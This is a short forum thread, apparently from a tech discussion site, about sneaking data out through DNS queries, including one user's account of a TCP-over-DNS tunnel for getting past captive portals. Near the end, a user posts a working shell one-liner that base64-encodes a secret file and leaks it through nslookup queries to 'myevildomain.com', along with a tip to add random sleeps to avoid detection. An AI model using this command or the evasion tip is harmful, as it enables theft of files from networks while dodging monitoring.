[goatinaboat]

you'd be able to `nslookup foo.com <your special server>` on

You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.

[DaiPlusPlus]

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server I ran on my colocated rack to allow me to surf the wider web when my laptop was connected to Wi-Fi captive portals.

The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).

It was slow though... I think I maxxed-out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.

[goatinaboat]

Yup - about 8 years ago or so, I built a TCP-over-DNS tunnel that smuggled data in DNS TXT records generated by a DNS server

It's even easier that if you just want to sneak a relatively small file out.

    for n in $(base64 mysecretfile|sed  's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done

Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.